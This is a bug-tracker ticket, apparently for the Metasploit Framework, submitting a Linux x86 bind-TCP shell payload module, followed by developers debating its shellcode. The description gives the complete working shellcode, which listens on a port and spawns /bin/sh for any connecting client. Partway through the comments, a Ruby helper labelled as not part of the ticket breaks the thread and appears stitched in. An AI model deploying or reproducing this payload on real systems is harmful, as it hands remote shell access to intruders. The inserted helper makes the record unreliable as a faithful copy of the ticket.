Ticket #106 (closed enhancement: fixed)

Opened 21 months ago

Last modified 18 months ago

New single shell_bind_tcp payload module for Linux x86

Reported by: ramon@… Owned by: mmiller
Priority: minor Milestone:
Component: framework3 Version:
Keywords: Cc:

Description

require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'

module Msf
module Payloads
module Singles
module Linux
module X86

module ShellBindTcp

	include Msf::Payload::Single

	def initialize(info = {})
		super(merge_info(info,
			'Name'          => 'Linux Command Shell, Bind TCP Inline',
			'Version'       => '$Revision$',
			'Description'   => 'Listen for a connection and spawn a command shell',
			'Author'        => 'Ramon de Carvalho Valle <ramon@risesecurity.org>',
			'License'       => GPL_LICENSE,
			'Platform'      => 'linux',
			'Arch'          => ARCH_X86,
			'Handler'       => Msf::Handler::BindTcp,
			'Session'       => Msf::Sessions::CommandShell,
			'Payload'       =>
				{
					'Offsets' =>
						{
							'LPORT'    => [ 21, 'n' ],
						},
					'Payload' =>
							"\x31\xdb"             +#   xorl    %ebx,%ebx                  #
							"\xf7\xe3"             +#   mull    %ebx                       #
							"\x53"                 +#   pushl   %ebx                       #
							"\x43"                 +#   incl    %ebx                       #
							"\x53"                 +#   pushl   %ebx                       #
							"\x6a\x02"             +#   pushl   $0x02                      #
							"\x89\xe1"             +#   movl    %esp,%ecx                  #
							"\xb0\x66"             +#   movb    $0x66,%al                  #
							"\xcd\x80"             +#   int     $0x80                      #
							"\x5b"                 +#   popl    %ebx                       #
							"\x5e"                 +#   popl    %esi                       #
							"\x52"                 +#   pushl   %edx                       #
							"\x68\xff\x02\x04\xd2" +#   pushl   $0xd20402ff                #
							"\x6a\x10"             +#   pushl   $0x10                      #
							"\x51"                 +#   pushl   %ecx                       #
							"\x50"                 +#   pushl   %eax                       #
							"\x89\xe1"             +#   movl    %esp,%ecx                  #
							"\x6a\x66"             +#   pushl   $0x66                      #
							"\x58"                 +#   popl    %eax                       #
							"\xcd\x80"             +#   int     $0x80                      #
							"\x89\x41\x04"         +#   movl    %eax,0x04(%ecx)            #
							"\xb3\x04"             +#   movb    $0x04,%bl                  #
							"\xb0\x66"             +#   movb    $0x66,%al                  #
							"\xcd\x80"             +#   int     $0x80                      #
							"\x43"                 +#   incl    %ebx                       #
							"\xb0\x66"             +#   movb    $0x66,%al                  #
							"\xcd\x80"             +#   int     $0x80                      #
							"\x93"                 +#   xchgl   %eax,%ebx                  #
							"\x59"                 +#   popl    %ecx                       #
							"\x6a\x3f"             +#   pushl   $0x3f                      #
							"\x58"                 +#   popl    %eax                       #
							"\xcd\x80"             +#   int     $0x80                      #
							"\x49"                 +#   decl    %ecx                       #
							"\x79\xf8"             +#   jns     <bndsockcode+50>           #
							"\x68\x2f\x2f\x73\x68" +#   pushl   $0x68732f2f                #
							"\x68\x2f\x62\x69\x6e" +#   pushl   $0x6e69622f                #
							"\x89\xe3"             +#   movl    %esp,%ebx                  #
							"\x50"                 +#   pushl   %eax                       #
							"\x53"                 +#   pushl   %ebx                       #
							"\x89\xe1"             +#   movl    %esp,%ecx                  #
							"\xb0\x0b"             +#   movb    $0x0b,%al                  #
							"\xcd\x80"              #   int     $0x80                      #
				}
			))
	end

end

end end end end end

Change History

Changed 20 months ago by mmiller

  • owner changed from hdm to mmiller

Looks like this is smaller than the existing one, going to look into it

Changed 19 months ago by vlad902

This payload has a number of bugs making it smaller. It does not clear eax before doing mov al, 0x66, doesn't clear edx before using it as a null value, initializes sin_family incorrectly, etc.

Changed 19 months ago by ramon@…

The first movb $0x66,%al is ok because %eax is already zero as a result of the mull %ebx instruction. As we usually don't do error checking, we assume that bind() and listen() are successful and return zero, so it's ok to movb $0x66,%al after bind() and listen(). In other cases where %eax is modified or returns a non-zero value I used the pushl $0x66, popl %eax combination. The sin_family is ok because the linux bind() system call maintains backward compatibility with some unix implementations where the sockaddr_in struct is:

struct sockaddr_in {
    uchar  sin_len         = xx   (does not matter for AF_INET)
    uchar  sin_family      = 02   (AF_INET)
    ushort sin_port        = contains the port value
    uint   sin_addr.s_addr = 00   (INADDR_ANY)
}

You can check it on kernel sources and here also:

http://www.lsd-pl.net/projects/asmcodes.zip

Best regards, Ramon
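An added analysis helper in Ruby (not part of the ticket or of the module above) that reconstructs the sockaddr_in the shellcode leaves on the stack with pushl %edx; pushl $0xd20402ff, decodes it both as Linux declares the struct (u16 sin_family) and under the sin_len/sin_family layout cited in the comment above, and checks that the module's LPORT offset 21 with the 'n' pack format lands on the sin_port bytes. It assumes only Ruby's String#unpack and the first 23 bytes of the listing in the description.

```ruby
# Added analysis helper; not code from the ticket or from the framework module.
# First 23 bytes of the listing above: the socket() call and the
# "pushl $0xd20402ff" that leaves a sockaddr_in on the stack for bind().
PAYLOAD_PREFIX = (
  "\x31\xdb"             + # xorl  %ebx,%ebx
  "\xf7\xe3"             + # mull  %ebx        -> %eax = %edx = 0
  "\x53\x43\x53"         + # pushl %ebx; incl %ebx; pushl %ebx (proto 0, SOCK_STREAM)
  "\x6a\x02"             + # pushl $0x02       (AF_INET)
  "\x89\xe1"             + # movl  %esp,%ecx   (argument array for socketcall)
  "\xb0\x66"             + # movb  $0x66,%al   (socketcall, %ebx = 1 = SYS_SOCKET)
  "\xcd\x80"             + # int   $0x80
  "\x5b\x5e\x52"         + # popl %ebx; popl %esi; pushl %edx (sin_addr = 0)
  "\x68\xff\x02\x04\xd2"   # pushl $0xd20402ff (sin_family + sin_port)
).b
LPORT_OFFSET = 21  # the module's 'Offsets' => { 'LPORT' => [ 21, 'n' ] }

# The 8 bytes the shellcode leaves at %esp as its sockaddr_in: the imm32 of
# "pushl $0xd20402ff" stored little-endian, then the four zero bytes of %edx.
def sockaddr_bytes(payload = PAYLOAD_PREFIX)
  i = payload.index("\x52\x68".b)          # pushl %edx ; pushl $imm32
  raise "push pair not found" unless i
  payload.byteslice(i + 2, 4) + ("\x00" * 4).b
end

# Read the struct as Linux declares it: u16 sin_family, u16 sin_port
# (network order), u32 sin_addr. The u16 family field reads 0x02ff here.
def decode_linux_layout(sa)
  family, port, addr = sa.unpack("vnN")
  { sin_family: family, sin_port: port, sin_addr: addr }
end

# Read it under the sin_len/sin_family layout: first byte sin_len (ignored),
# second byte sin_family = 2 (AF_INET), then sin_port and sin_addr.
def decode_bsd_layout(sa)
  len, family, port, addr = sa.unpack("CCnN")
  { sin_len: len, sin_family: family, sin_port: port, sin_addr: addr }
end

# 'n' in the Offsets entry is the Ruby pack format for a 16-bit network-order
# value: the two bytes at offset 21 are the sin_port field.
def lport_from_offsets(payload = PAYLOAD_PREFIX)
  payload.byteslice(LPORT_OFFSET, 2).unpack1("n")
end

# Offset 21 must point at bytes 3..4 of that imm32 (the sin_port field).
def lport_offset_consistent?(payload = PAYLOAD_PREFIX)
  i = payload.index("\x52\x68".b)
  !i.nil? && i + 2 + 2 == LPORT_OFFSET
end
```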

Changed 19 months ago by ramon@…

Ahh, forgot to say that %edx was also cleared as a result of mull %ebx, which returns its multiplication result on %eax:%edx, clearing both.

Best regards, Ramon

Changed 18 months ago by ramon

  • status changed from new to closed
  • resolution set to fixed

(In [5068]) Fixes #106. Added new single shell_bind_tcp payload module for Linux x86. See #106.
